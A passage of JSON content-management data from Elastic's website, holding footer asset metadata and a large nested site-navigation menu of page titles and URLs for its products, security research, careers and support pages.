blt6ef5841a45696d80","ACL":{},"content_type":"image/svg+xml","created_at":"2023-08-02T10:05:35.275Z","created_by":"blt3e52848e0cb3c394","file_size":"1327","filename":"icon-footer-github.svg","parent_uid":null,"tags":[],"title":"icon-footer-github.svg","updated_at":"2023-08-02T10:05:35.275Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-06-26T23:47:50.075Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6ef5841a45696d80/64ca2a6fc530871313bc3822/icon-footer-github.svg"},"hover_icon":null,"tracking_id":""}],"tags":[],"title":"Footer Redesign 2023","updated_at":"2024-11-07T21:46:07.252Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-11-09T02:07:26.435Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},"headers":{"country-code":"SG"},"subNav":[[{"uid":"bltaa9e8ef97db20945","_version":177,"locale":"en-us","ACL":{},"collapse_menu":{"title_l10n":"Collapse menu"},"created_at":"2022-03-15T00:28:09.929Z","created_by":"blt3044324473ef223b70bc674c","level_2":[{"title_l10n":"About","_metadata":{"uid":"cs8e091c3682d07b9f"},"url":"/about","level_3":[{"title_l10n":"Leadership","_metadata":{"uid":"cs51a59c6870a53681"},"url":"/about/leadership","level_4":[]},{"title_l10n":"Board","_metadata":{"uid":"cs93163805bdd45c96"},"url":"/about/board","level_4":[]},{"title_l10n":"Open source","_metadata":{"uid":"cs23a3f05026c3f3aa"},"url":"/about/open-source","level_4":[]},{"title_l10n":"Media","_metadata":{"uid":"cs0b695b5ccd67dfe7"},"url":"/about/press","level_4":[]},{"title_l10n":"ESG","_metadata":{"uid":"csfc5459e2272d8169"},"url":"/about/esg","level_4":[]},{"title_l10n":"Trust","_metadata":{"uid":"cs854223d2b53a055d"},"url":"/trust","level_4":[]}],"unlisted":[{"title_l10n":"Source Code","_metadata":{"uid":"cse7f28813f700063b"},"url":"/about/our-source-code"},{"title_l10n":"Distributed","_metadata":{"uid":"cs4069554cd5f6b28a"},"url":"/about/distributed"}]},{"title_l10n":"Blog","_metadata":{"uid":"cs15a678df84fd56c2"},"url":"/blog","level_3":[{"title_l10n":"Solutions","_metadata":{"uid":"cs4207ff196bc706b1"},"url":"/blog/category/solutions","level_4":[]},{"title_l10n":"Stack + Cloud","_metadata":{"uid":"cs5441abdada9821d3"},"url":"/blog/category/stack-cloud","level_4":[]},{"title_l10n":"News","_metadata":{"uid":"cs1e85870f77b92cd6"},"url":"/blog/category/company-news","level_4":[]},{"title_l10n":"Customers","_metadata":{"uid":"cs825404bee91003c3"},"url":"/blog/category/customers","level_4":[]},{"title_l10n":"Generative AI","_metadata":{"uid":"csaa7aa42e834f4477"},"url":"/blog/category/generative-ai","level_4":[]},{"title_l10n":"Culture","_metadata":{"uid":"csef703334f6243895"},"url":"/blog/category/culture","level_4":[]}],"unlisted":[]},{"title_l10n":"Careers","_metadata":{"uid":"cs969077f437917ab2"},"url":"/careers/","level_3":[{"title_l10n":"Our values","_metadata":{"uid":"cs4b8d5b0e5636d8f3"},"url":"/careers/our-values","level_4":[]},{"title_l10n":"Diversity","_metadata":{"uid":"cs9e9e3af649cdca99"},"url":"/careers/diversity-and-inclusion","level_4":[]},{"title_l10n":"Apply now","_metadata":{"uid":"cs40392061bf97b03f"},"url":"https://jobs.elastic.co/all-openings#/","level_4":[]},{"title_l10n":"How we hire","_metadata":{"uid":"csd4df1b5e6f6e2202"},"url":"/careers/how-we-hire","level_4":[]}],"unlisted":[]},{"title_l10n":"Community","_metadata":{"uid":"csa7c1026c5be4ea6e"},"url":"/community","level_3":[{"title_l10n":"Meetups","_metadata":{"uid":"cs5f78ad934ea2205a"},"url":"https://www.meetup.com/pro/elastic/","level_4":[]},{"title_l10n":"Forums","_metadata":{"uid":"csdbb9e951df255450"},"url":"https://discuss.elastic.co/","level_4":[]},{"title_l10n":"Contributors","_metadata":{"uid":"csd075c05386901a0f"},"url":"","level_4":[{"title_l10n":"Overview","_metadata":{"uid":"cs26101e3bed0a4d02"},"url":"/community/contributor"},{"title_l10n":"Rules","_metadata":{"uid":"cs22e3a8ac4fe28ce5"},"url":"/community/contributor/rules"},{"title_l10n":"Submissions","_metadata":{"uid":"cscb9adc71046046b8"},"url":"/community/contributor/submissions"},{"title_l10n":"Awards","_metadata":{"uid":"cs4b5f2e050fad550b"},"url":"/community/contributor/awards"},{"title_l10n":"FAQ","_metadata":{"uid":"cs59205ebe12a7ec2d"},"url":"/community/contributor/faq"},{"title_l10n":"Contributor portal","_metadata":{"uid":"cs2e8a2af70005fb4c"},"url":"https://contributor-program.app.elstc.co/"}]},{"title_l10n":"Code of conduct","_metadata":{"uid":"csa8ceb4bdb0d19c1d"},"url":"/community/codeofconduct","level_4":[]},{"title_l10n":"Newsletter","_metadata":{"uid":"cscbc9596811de7ad0"},"url":"/community/newsletter","level_4":[]},{"title_l10n":"Help","_metadata":{"uid":"cs1a30f9e3c4d47a24"},"url":"/community/help","level_4":[]}],"unlisted":[]},{"title_l10n":"Consulting","_metadata":{"uid":"cs0048b24adf49ac89"},"url":"/consulting","level_3":[{"title_l10n":"Boost services","_metadata":{"uid":"cs93b353c225c34e62"},"url":"/consulting/boost-services","level_4":[]},{"title_l10n":"Cloud migration","_metadata":{"uid":"cs267573d97e318669"},"url":"/consulting/cloud-migration-services","level_4":[]},{"title_l10n":"Advisory services","_metadata":{"uid":"cs60ffc2c0967469de"},"url":"/consulting/advisory-services","level_4":[]},{"title_l10n":"Contact","_metadata":{"uid":"csa6ac6c2c01f8e140"},"url":"/consulting/contact","level_4":[]}],"unlisted":[]},{"title_l10n":"Customers","_metadata":{"uid":"csc0ea258b71fc82b0"},"url":"/customers","level_3":[{"title_l10n":"Use cases","_metadata":{"uid":"cs070e1aed0e6b3d61"},"url":"","level_4":[{"title_l10n":"Search","_metadata":{"uid":"csc49f7b01bd1f922f"},"url":"/customers/success-stories?usecase=enterprise-search\u0026industry=All"},{"title_l10n":"Observability","_metadata":{"uid":"csc67dd4db7de37244"},"url":"/customers/success-stories?usecase=elastic-observability\u0026industry=All"},{"title_l10n":"Security","_metadata":{"uid":"cs399d89851a0da445"},"url":"/customers/success-stories?usecase=security-analytics\u0026industry=All"}]},{"title_l10n":"Value","_metadata":{"uid":"csf92f4d053140915f"},"url":"/customers/value","level_4":[]}],"unlisted":[{"title_l10n":"Customer value","_metadata":{"uid":"csdc32877d2588370d"},"url":"/customers/value"}]},{"title_l10n":"Elastic Cloud","_metadata":{"uid":"csadc9ecd5d3ccbc57"},"url":"/cloud","level_3":[{"title_l10n":"Serverless","_metadata":{"uid":"csc13d13e75a303990"},"url":"/cloud/serverless","level_4":[{"title_l10n":"Serverless roadmap","_metadata":{"uid":"csb4626fd3abd2508f"},"url":"/cloud/serverless/roadmap"},{"title_l10n":"Search AI Lake","_metadata":{"uid":"cs1451f73495a09dda"},"url":"/cloud/serverless/search-ai-lake"}]},{"title_l10n":"Regions","_metadata":{"uid":"csd395063dddd8845c"},"url":"/cloud/regions","level_4":[]},{"title_l10n":"Docs","_metadata":{"uid":"cs0601c60d26f18c69"},"url":"https://www.elastic.co/guide/en/cloud/current/index.html","level_4":[]},{"title_l10n":"Shared responsibility","_metadata":{"uid":"cs78cfc0cc33a0f07a"},"url":"/cloud/shared-responsibility","level_4":[]},{"title_l10n":"Cloud migration","_metadata":{"uid":"cs99559229bb453ba4"},"url":"","level_4":[{"title_l10n":"Developers","_metadata":{"uid":"cs6b23c5745eabd086"},"url":"/cloud/platform-migration-dev/"},{"title_l10n":"Business Leaders","_metadata":{"uid":"csa656e7b98e93ec8f"},"url":"/cloud/platform-migration"},{"title_l10n":"Consulting services","_metadata":{"uid":"cs505e18ed277cc6ce"},"url":"/cloud/cloud-migration-services"}]}],"unlisted":[{"title_l10n":"Elastic Cloud Enterprise","_metadata":{"uid":"csad2dd1950db00c3a"},"url":"/ece"},{"title_l10n":"Elastic Cloud on Kubernetes","_metadata":{"uid":"cs116ae0b80627d3bd"},"url":"/elastic-cloud-kubernetes"},{"title_l10n":"Elastic App Search Service","_metadata":{"uid":"csb105633fb925c2f6"},"url":"/app-search/service"},{"title_l10n":"App Search Service pricing","_metadata":{"uid":"cs714085379fda18e6"},"url":"/app-search/service/pricing"},{"title_l10n":"Elastic Site Search Service","_metadata":{"uid":"cscd76d7fa04786f14"},"url":"/site-search/service"},{"title_l10n":"Site Search Service pricing","_metadata":{"uid":"cseafb7630188819b8"},"url":"/site-search/service/pricing"}]},{"title_l10n":"Elastic Stack","_metadata":{"uid":"cs60a7b8db425ecda6"},"url":"/elastic-stack","level_3":[{"title_l10n":"Features","_metadata":{"uid":"cs4c2b753f00e29c11"},"url":"/elastic-stack/features","level_4":[]},{"title_l10n":"Capabilities","_metadata":{"uid":"cs0ac881f9652ac2dc"},"url":"","level_4":[{"title_l10n":"Stack security","_metadata":{"uid":"csb16e64ebe7794179"},"url":"/what-is/elastic-stack-security"},{"title_l10n":"Machine learning","_metadata":{"uid":"cse6053162c8526c10"},"url":"/what-is/elasticsearch-machine-learning"},{"title_l10n":"Geospatial","_metadata":{"uid":"cscdff16895437806c"},"url":"/geospatial"},{"title_l10n":"Vector database","_metadata":{"uid":"cse48968b090b6807f"},"url":"/elasticsearch/vector-database"},{"title_l10n":"AutoOps","_metadata":{"uid":"cs42bff71c0925503d"},"url":"/platform/autoops"}]},{"title_l10n":"Elasticsearch","_metadata":{"uid":"cs6928bf21a330389c"},"url":"","level_4":[{"title_l10n":"Overview","_metadata":{"uid":"cs08cabb5a3b90ede9"},"url":"/elasticsearch"},{"title_l10n":"Features","_metadata":{"uid":"cs03c3242fafe8f43c"},"url":"/elasticsearch/features"},{"title_l10n":"Elasticsearch Service","_metadata":{"uid":"cs9847a5cb39480166"},"url":"/elasticsearch/service"},{"title_l10n":"Elasticsearch searchable snapshots","_metadata":{"uid":"csf47888fa25ecb5f2"},"url":"/elasticsearch/elasticsearch-searchable-snapshots"},{"title_l10n":"Elasticsearch runtime fields","_metadata":{"uid":"cs1f99c5679876f78f"},"url":"/elasticsearch/elasticsearch-runtime-fields"},{"title_l10n":"Elasticsearch Relevance Engine","_metadata":{"uid":"cs404ad7d9e4de8ada"},"url":"/elasticsearch/elasticsearch-relevance-engine"}]},{"title_l10n":"Kibana","_metadata":{"uid":"cs78304ca2eada29b7"},"url":"","level_4":[{"title_l10n":"Overview","_metadata":{"uid":"cs0eb09309d8eb60e8"},"url":"/kibana"},{"title_l10n":"Features","_metadata":{"uid":"cs29c3df77aa69834b"},"url":"/kibana/features"},{"title_l10n":"Kibana Canvas","_metadata":{"uid":"csb2c5fc936c9d37e9"},"url":"/what-is/kibana-canvas"},{"title_l10n":"Kibana Lens","_metadata":{"uid":"cs81b16f5b629c6734"},"url":"/kibana/kibana-lens"},{"title_l10n":"Kibana dashboard","_metadata":{"uid":"cs37cc1272dc9d1e79"},"url":"/kibana/kibana-dashboard"},{"title_l10n":"Kibana alerting","_metadata":{"uid":"csdca15c27859f48ca"},"url":"/what-is/kibana-alerting"},{"title_l10n":"Elastic Maps","_metadata":{"uid":"cs8f301712e95044fe"},"url":"/maps"},{"title_l10n":"Elastic Maps Service","_metadata":{"uid":"csf728be400b42cd60"},"url":"/elastic-maps-service"}]},{"title_l10n":"Integrations","_metadata":{"uid":"cs7e4a2f68f369617b"},"url":"","level_4":[{"title_l10n":"Overview","_metadata":{"uid":"cs85db9ea3ae40465e"},"url":"/integrations"},{"title_l10n":"Data integrations","_metadata":{"uid":"csfcd0e63e8f2ee96a"},"url":"/integrations/data-integrations"},{"title_l10n":"Elastic Agent","_metadata":{"uid":"cs2751f90a3cec66f9"},"url":"/elastic-agent"},{"title_l10n":"Beats","_metadata":{"uid":"cscba27789614477d8"},"url":"/beats"},{"title_l10n":"Logstash","_metadata":{"uid":"cs3fd37ce923d20d9b"},"url":"/logstash"},{"title_l10n":"Web crawler","_metadata":{"uid":"csaf5ad6e3c2c8d43a"},"url":"/web-crawler"},{"title_l10n":"Content connectors","_metadata":{"uid":"cs3f2fc425a0ee4265"},"url":"/workplace-search/content-sources"}]},{"title_l10n":"Docs","_metadata":{"uid":"cs50ae00c58f827097"},"url":"https://www.elastic.co/guide/en/elastic-stack/current/index.html","level_4":[]}],"unlisted":[{"title_l10n":"What is Elasticsearch","_metadata":{"uid":"csf97903f364909b99"},"url":"/what-is/elasticsearch"},{"title_l10n":"Open X-Pack","_metadata":{"uid":"csc78be312aaff7a28"},"url":"/what-is/open-x-pack"},{"title_l10n":"What is the ELK Stack","_metadata":{"uid":"csdffef2c490972db8"},"url":"/what-is/elk-stack"},{"title_l10n":"Elasticsearch SQL","_metadata":{"uid":"cs404c333ec7ec4952"},"url":"/what-is/elasticsearch-sql"},{"title_l10n":"Elasticsearch-Hadoop","_metadata":{"uid":"cs6c24a5a40f30dfd4"},"url":"/what-is/elasticsearch-hadoop"},{"title_l10n":"Elasticsearch business analytics","_metadata":{"uid":"cs8fd31c81ae759787"},"url":"/what-is/elasticsearch-business-analytics"},{"title_l10n":"Elasticsearch graph","_metadata":{"uid":"cs8e205d91ee02bb96"},"url":"/what-is/elasticsearch-graph"},{"title_l10n":"Elasticsearch monitoring","_metadata":{"uid":"cs8bb9c4f6d47f9844"},"url":"/what-is/elasticsearch-monitoring"},{"title_l10n":"Elastic Common Schema","_metadata":{"uid":"cs7b1c798a93d36629"},"url":"/what-is/ecs"},{"title_l10n":"AWS Elasticsearch Service","_metadata":{"uid":"csc3872252e7286b8b"},"url":"/aws-elasticsearch-service"},{"title_l10n":"OpenSearch","_metadata":{"uid":"cs1b26f037931beadd"},"url":"/what-is/opensearch"},{"title_l10n":"What is Kibana","_metadata":{"uid":"csa66c8bfb9eeb7d64"},"url":"/what-is/kibana"},{"title_l10n":"Kibana feedback","_metadata":{"uid":"csa1f9cce921215858"},"url":"/kibana/feedback"},{"title_l10n":"Kibana ask us questions","_metadata":{"uid":"cs123bbb4d6f52c352"},"url":"/kibana/ask-elastic"},{"title_l10n":"Kibana reporting","_metadata":{"uid":"csa143fdde145d7da8"},"url":"/what-is/kibana-reporting"},{"title_l10n":"ServiceNow and Elastic","_metadata":{"uid":"cs23b5bf47ce54388e"},"url":"/what-is/servicenow"},{"title_l10n":"Help","_metadata":{"uid":"csca062d77a79f2faf"},"url":"/help"}]},{"title_l10n":"Search","_metadata":{"uid":"cs815dbfdfcb5d665d"},"url":"/enterprise-search","level_3":[{"title_l10n":"Capabilities","_metadata":{"uid":"csae031a6128f7400f"},"url":"","level_4":[{"title_l10n":"Data ingestion","_metadata":{"uid":"cs1840c4df996b35ab"},"url":"/enterprise-search/data-ingestion"},{"title_l10n":"Search UI","_metadata":{"uid":"cs2bfeb97c747a96a7"},"url":"/enterprise-search/search-ui"},{"title_l10n":"Search analytics","_metadata":{"uid":"csb97709dfb73eab49"},"url":"/enterprise-search/search-analytics"},{"title_l10n":"Provisioning","_metadata":{"uid":"cs802968c46c6d4a90"},"url":"/enterprise-search/deployment"},{"title_l10n":"Relevance","_metadata":{"uid":"csdb072364aaa5fb4b"},"url":"/enterprise-search/relevance"},{"title_l10n":"Machine learning","_metadata":{"uid":"cse1133a3fb4606c9a"},"url":"/enterprise-search/machine-learning"},{"title_l10n":"Vector database","_metadata":{"uid":"cse18cb18a810a2b13"},"url":"/elasticsearch/vector-database"},{"title_l10n":"Retrieval Augmented Generation","_metadata":{"uid":"cs5bb2a1c8ad475327"},"url":"/enterprise-search/rag"}]},{"title_l10n":"Use cases","_metadata":{"uid":"cs232455854532744c"},"url":"","level_4":[{"title_l10n":"Search applications","_metadata":{"uid":"cs9f7fba4ad3dd44bb"},"url":"/enterprise-search/search-applications"},{"title_l10n":"Ecommerce","_metadata":{"uid":"cs91e93b3cb71b94b2"},"url":"/enterprise-search/ecommerce"},{"title_l10n":"Website","_metadata":{"uid":"cs127db46d15150d15"},"url":"/enterprise-search/site-search"},{"title_l10n":"Workplace search","_metadata":{"uid":"csadc4b4c5dd21b53f"},"url":"/enterprise-search/workplace-search"},{"title_l10n":"Customer support","_metadata":{"uid":"cscb4a04887f303e5d"},"url":"/enterprise-search/customer-support"}]},{"title_l10n":"Docs","_metadata":{"uid":"cs1a6f89380c0872c8"},"url":"https://www.elastic.co/guide/en/enterprise-search/current/index.html","level_4":[]}],"unlisted":[]},{"title_l10n":"Events","_metadata":{"uid":"csbcb9840ba1d9acdb"},"url":"/events","level_3":[{"title_l10n":"Event videos","_metadata":{"uid":"csef7fae775cb448ac"},"url":"/events/videos","level_4":[]},{"title_l10n":"Elastic Excellence Awards","_metadata":{"uid":"csce1bc3f82e76e201"},"url":"/events/awards","level_4":[]},{"title_l10n":"Sponsor","_metadata":{"uid":"cs1029354d0af20664"},"url":"/events/sponsor","level_4":[]}],"unlisted":[]},{"title_l10n":"Getting started","_metadata":{"uid":"cs81808631706d95aa"},"url":"/getting-started","level_3":[{"title_l10n":"Data ingest","_metadata":{"uid":"cs4551c049b5bce4a9"},"url":"/customer-success/data-ingestion","level_4":[]},{"title_l10n":"Search Guides","_metadata":{"uid":"cs4dd23a7a841db1b3"},"url":"","level_4":[{"title_l10n":"Build an AI-powered search experience","_metadata":{"uid":"csf73f8655be7769c1"},"url":"/getting-started/enterprise-search/build-a-semantic-search-experience"},{"title_l10n":"Search across databases and business systems","_metadata":{"uid":"cs94f1e8b406cae10c"},"url":"/getting-started/enterprise-search/search-across-business-systems-and-software"},{"title_l10n":"Add search to your website","_metadata":{"uid":"cs7c73d9c5e1b9c693"},"url":"/getting-started/enterprise-search/add-search-to-your-website"},{"title_l10n":"Set up vector search","_metadata":{"uid":"cs45277c6abe450b02"},"url":"/getting-started/enterprise-search/vector-search"},{"title_l10n":"Build an application on top of Elasticsearch","_metadata":{"uid":"csb5c046a7df26ed60"},"url":"/getting-started/enterprise-search/build-an-application-on-top-of-elasticsearch"}]},{"title_l10n":"Observability Guides","_metadata":{"uid":"cse4691fd58cd3e1fe"},"url":"","level_4":[{"title_l10n":"Collect and analyze logs","_metadata":{"uid":"cs0fdbe552cdda5d84"},"url":"/getting-started/observability/collect-and-analyze-logs"},{"title_l10n":"Application performance monitoring","_metadata":{"uid":"cse9bc3f5a66245f0a"},"url":"/getting-started/observability/monitor-your-application-performance"},{"title_l10n":"Monitor your hosts","_metadata":{"uid":"cs50a6e0ab8c07d2fb"},"url":"/getting-started/observability/monitor-your-hosts"},{"title_l10n":"Kubernetes monitoring","_metadata":{"uid":"cs5bbc668d4f1ef63e"},"url":"/getting-started/observability/monitor-kubernetes-clusters"},{"title_l10n":"Synthetic monitoring","_metadata":{"uid":"cs61ca4004d8aab0e4"},"url":"/getting-started/observability/create-synthetic-monitor"},{"title_l10n":"Universal Profiling","_metadata":{"uid":"csd3d34889c9f97dbc"},"url":"/getting-started/observability/universal-profiling"}]},{"title_l10n":"Security Guides","_metadata":{"uid":"cs338104439ba04d75"},"url":"","level_4":[{"title_l10n":"SIEM","_metadata":{"uid":"cs06bf6cebc83287a7"},"url":"/getting-started/security/detect-threats-in-my-data-with-siem"},{"title_l10n":"Endpoint Security","_metadata":{"uid":"cs77396d612fe76685"},"url":"/getting-started/security/secure-my-hosts-with-endpoint-security"},{"title_l10n":"Cloud Security Posture Management","_metadata":{"uid":"cs35a5d9c5449f4ac5"},"url":"/getting-started/security/secure-my-cloud-assets-with-cloud-security-posture-management"}]},{"title_l10n":"Cloud providers","_metadata":{"uid":"cse05b315407095d1b"},"url":"","level_4":[{"title_l10n":"AWS","_metadata":{"uid":"csa16e918cc9bffb18"},"url":"/getting-started/aws"},{"title_l10n":"Google Cloud","_metadata":{"uid":"cs81ea6102c539d232"},"url":"/getting-started/google-cloud"},{"title_l10n":"Microsoft Azure","_metadata":{"uid":"csdbcf27b684e503ee"},"url":"/getting-started/microsoft-azure"}]}],"unlisted":[{"title_l10n":"Resources","_metadata":{"uid":"cs6dd493af724f798a"},"url":"/customer-success/resources"},{"title_l10n":"Customer success","_metadata":{"uid":"cs9f7d53a4c318df4d"},"url":"/customer-success/"}]},{"title_l10n":"Learn","_metadata":{"uid":"cs8bb13f85f00dddcd"},"url":"/learn","level_3":[{"title_l10n":"Videos","_metadata":{"uid":"cs653df48587680973"},"url":"/videos","level_4":[]},{"title_l10n":"White paper","_metadata":{"uid":"csb7a951170183ca96"},"url":"/learn/exploration-center","level_4":[]}],"unlisted":[]},{"title_l10n":"Observability","_metadata":{"uid":"cse4e0fb50dd4e95fd"},"url":"/observability","level_3":[{"title_l10n":"Capabilities","_metadata":{"uid":"csc296f379a0602ce1"},"url":"","level_4":[{"title_l10n":"Application performance monitoring","_metadata":{"uid":"cseab0aa3128578bc9"},"url":"/observability/application-performance-monitoring"},{"title_l10n":"Log monitoring","_metadata":{"uid":"csd03474cbaf4902ce"},"url":"/observability/log-monitoring"},{"title_l10n":"Infrastructure monitoring","_metadata":{"uid":"cs46ef7fc35494bfa7"},"url":"/observability/infrastructure-monitoring"},{"title_l10n":"Real user monitoring","_metadata":{"uid":"csea9acd1bbbbfde95"},"url":"/observability/real-user-monitoring"},{"title_l10n":"Synthetic monitoring","_metadata":{"uid":"cs44921c274725fe6d"},"url":"/observability/synthetic-monitoring"},{"title_l10n":"Universal profiling","_metadata":{"uid":"csace62291bb813cd4"},"url":"/observability/ebpf-continuous-code-profiling"}]},{"title_l10n":"Use cases","_metadata":{"uid":"cs64047eecb6ef228c"},"url":"","level_4":[{"title_l10n":"Cloud monitoring","_metadata":{"uid":"cs805172c3209d1b54"},"url":"/observability/cloud-monitoring"},{"title_l10n":"DevOps","_metadata":{"uid":"cs90631dd39dad3a1a"},"url":"/observability/devops"},{"title_l10n":"Cloud migration","_metadata":{"uid":"csc12e5aecf32ec016"},"url":"/observability/cloud-migration"},{"title_l10n":"Cloud native","_metadata":{"uid":"cs8a37f3b2b907608f"},"url":"/observability/cloud-native"},{"title_l10n":"Kubernetes monitoring","_metadata":{"uid":"csd55c740f313186b9"},"url":"/observability/kubernetes-monitoring"},{"title_l10n":"Serverless monitoring","_metadata":{"uid":"csb93f6b68cd95688f"},"url":"/observability/serverless-monitoring"},{"title_l10n":"OpenTelemetry","_metadata":{"uid":"cs67530af55fe9b32c"},"url":"/observability/opentelemetry"},{"title_l10n":"AIOps","_metadata":{"uid":"csf4a5b4cccd8b4420"},"url":"/observability/aiops"},{"title_l10n":"Digital experience","_metadata":{"uid":"csd3064a183915f3cb"},"url":"/observability/digital-experience-monitoring"},{"title_l10n":"Tool Consolidation","_metadata":{"uid":"csdd3038cf0d5189bd"},"url":"/observability/tool-consolidation"}]},{"title_l10n":"Integrations","_metadata":{"uid":"cs242e973705950a46"},"url":"/integrations/data-integrations?solution=observability","level_4":[]},{"title_l10n":"Docs","_metadata":{"uid":"cs98524b345bd61a42"},"url":"https://www.elastic.co/guide/en/observability/current/index.html","level_4":[]}],"unlisted":[{"title_l10n":"Prometheus monitoring","_metadata":{"uid":"cs8a431f6fa437a2d9"},"url":"/elasticsearch/prometheus-monitoring"}]},{"title_l10n":"Partners","_metadata":{"uid":"cs3155ab73235c8389"},"url":"/partners","level_3":[{"title_l10n":"Become a partner","_metadata":{"uid":"cs7701e9efdd695240"},"url":"/partners/become-a-partner","level_4":[]},{"title_l10n":"Support","_metadata":{"uid":"cs65a1c96e522aabd8"},"url":"","level_4":[{"title_l10n":"Contact us","_metadata":{"uid":"cs1fee03324e45ae1e"},"url":"/partners/contact"},{"title_l10n":"Program guide","_metadata":{"uid":"cs2f056d86678ebfc4"},"url":"/partners/program"}]},{"title_l10n":"Partner account","_metadata":{"uid":"cs236419f427ae708f"},"url":"","level_4":[{"title_l10n":"Login","_metadata":{"uid":"csf3e5ca80df9a2ec4"},"url":"https://login.elastic.co/login/partner"},{"title_l10n":"Request access","_metadata":{"uid":"csd1d246815afdb7da"},"url":"https://partners.elastic.co/English/register_email.aspx"}]}],"unlisted":[]},{"title_l10n":"Platform","_metadata":{"uid":"cs3dab20cab2c29923"},"url":"/products","level_3":[{"title_l10n":"What's new","_metadata":{"uid":"cs8a308f98f32daacf"},"url":"/whats-new","level_4":[]}],"unlisted":[]},{"title_l10n":"Pricing","_metadata":{"uid":"csfc63cdfc1c06399d"},"url":"/pricing","level_3":[{"title_l10n":"Elastic Cloud Serverless","_metadata":{"uid":"csb8a4fdb9c3bc4300"},"url":"","level_4":[{"title_l10n":"Elasticsearch Serverless","_metadata":{"uid":"csd97bc438bdc6d807"},"url":"/pricing/serverless-search"},{"title_l10n":"Elastic Security Serverless","_metadata":{"uid":"cs936f5653e401ba68"},"url":"/pricing/serverless-security"},{"title_l10n":"Elastic Observability Serverless","_metadata":{"uid":"csc47cb6fcee6a3718"},"url":"/pricing/serverless-observability"}]},{"title_l10n":"Benefits","_metadata":{"uid":"csb5cd64003b72b082"},"url":"/pricing/benefits","level_4":[]},{"title_l10n":"FAQ","_metadata":{"uid":"cs689e5f5ca8e039b0"},"url":"/pricing/faq","level_4":[]},{"title_l10n":"Features","_metadata":{"uid":"csc2015a372acc1084"},"url":"","level_4":[{"title_l10n":"Elastic Cloud","_metadata":{"uid":"csf1bb052541fd91ef"},"url":"/subscriptions/cloud"},{"title_l10n":"Self-managed","_metadata":{"uid":"cs21f845b2fe5757d2"},"url":"/subscriptions"}]}],"unlisted":[]},{"title_l10n":"Security","_metadata":{"uid":"cs16cbda02c3601d34"},"url":"/security/","level_3":[{"title_l10n":"Capabilities","_metadata":{"uid":"cseae0b1e586ba8fac"},"url":"","level_4":[{"title_l10n":"SIEM","_metadata":{"uid":"csa7c6619304d5d43e"},"url":"/security/siem"},{"title_l10n":"AI for the SOC","_metadata":{"uid":"csec7f9985bfa7acd1"},"url":"/security/ai"},{"title_l10n":"Security research","_metadata":{"uid":"cs48b56bae35f752ac"},"url":"https://www.elastic.co/security-labs"}]},{"title_l10n":"Features","_metadata":{"uid":"cs0106c99cab044dee"},"url":"","level_4":[{"title_l10n":"Endpoint Security","_metadata":{"uid":"csd2a677bc227c9b5c"},"url":"/security/endpoint-security"},{"title_l10n":"Cloud Security","_metadata":{"uid":"cs6ba30fd6994fd441"},"url":"/security/cloud-security"},{"title_l10n":"XDR","_metadata":{"uid":"cs8f2e4665d3e05358"},"url":"/security/xdr"},{"title_l10n":"CDR","_metadata":{"uid":"csfedb5e2871b95180"},"url":"/security/cloud-detection-and-response"}]},{"title_l10n":"Use cases","_metadata":{"uid":"cs501631844000d8ff"},"url":"","level_4":[{"title_l10n":"Continuous Monitoring","_metadata":{"uid":"cs516d9e75901b9e2f"},"url":"/security/continuous-monitoring"},{"title_l10n":"Threat Hunting","_metadata":{"uid":"cse59e1656166da3c2"},"url":"/security/threat-hunting"},{"title_l10n":"Streamlined investigation \u0026 response","_metadata":{"uid":"cse5d322ffe4da2123"},"url":"/security/investigation-response"},{"title_l10n":"Automated Threat Protection","_metadata":{"uid":"cs923005404e1e9a58"},"url":"/security/automated-threat-protection"}]},{"title_l10n":"Value calculator","_metadata":{"uid":"cs2d4170dce7f39ad5"},"url":"/security/value-calculator","level_4":[]},{"title_l10n":"Docs","_metadata":{"uid":"csce035df42beb2608"},"url":"https://www.elastic.co/guide/en/security/current/index.html","level_4":[]}],"unlisted":[]},{"title_l10n":"Security Labs","_metadata":{"uid":"csf6824d930aad376a"},"url":"/security-labs","level_3":[{"title_l10n":"About","_metadata":{"uid":"csb2589ed0d7b2a427"},"url":"/security-labs/about","level_4":[]},{"title_l10n":"Topics","_metadata":{"uid":"cse25a23f2a3af802a"},"url":"","level_4":[{"title_l10n":"Security Research","_metadata":{"uid":"cs7b629f746bd8afc2"},"url":"/security-labs/security-research"},{"title_l10n":"Malware Analysis","_metadata":{"uid":"cs2f3f082807873a63"},"url":"/security-labs/malware-analysis"},{"title_l10n":"Campaign","_metadata":{"uid":"cs1efed0ff19b6cb7d"},"url":"/security-labs/campaign"},{"title_l10n":"Groups \u0026 Tactics","_metadata":{"uid":"csb10dafb9c8538737"},"url":"/security-labs/groups-and-tactics"},{"title_l10n":"Detection Science","_metadata":{"uid":"csed887fc3ed3cacf6"},"url":"/security-labs/detection-science"}]},{"title_l10n":"Vuln updates","_metadata":{"uid":"csdc16bf239e9db7a9"},"url":"/security-labs/vulnerability-updates","level_4":[]},{"title_l10n":"Reports","_metadata":{"uid":"cs9f95eb60b65c9ec6"},"url":"/security-labs/reports","level_4":[]},{"title_l10n":"Tools","_metadata":{"uid":"cs424a38936637b3fb"},"url":"/security-labs/tools","level_4":[]}],"unlisted":[]},{"title_l10n":"Support","_metadata":{"uid":"cs32a26731618404a3"},"url":"/support","level_3":[{"title_l10n":"Support matrix","_metadata":{"uid":"csf95633f0f6b12cc7"},"url":"/support/matrix","level_4":[]},{"title_l10n":"Submit ticket","_metadata":{"uid":"cs7977b44b540d7211"},"url":"https://support.elastic.co/","level_4":[]}],"unlisted":[]},{"title_l10n":"Training","_metadata":{"uid":"csa5adc240a715c659"},"url":"/training","level_3":[{"title_l10n":"Private","_metadata":{"uid":"csb2c5866403d9a976"},"url":"/training/private-training","level_4":[]},{"title_l10n":"Subscriptions","_metadata":{"uid":"cs4303c8ed367f3d2b"},"url":"/training/subscriptions","level_4":[]},{"title_l10n":"Certifications","_metadata":{"uid":"csaf4321a2ffd12544"},"url":"/training/certification","level_4":[]},{"title_l10n":"Schedule","_metadata":{"uid":"cs03d21c9ad4b35af1"},"url":"/training/schedule","level_4":[]},{"title_l10n":"FAQ","_metadata":{"uid":"cscb69ba6d9cbf9d6c"},"url":"/training/faq","level_4":[]}],"unlisted":[]},{"title_l10n":"Use 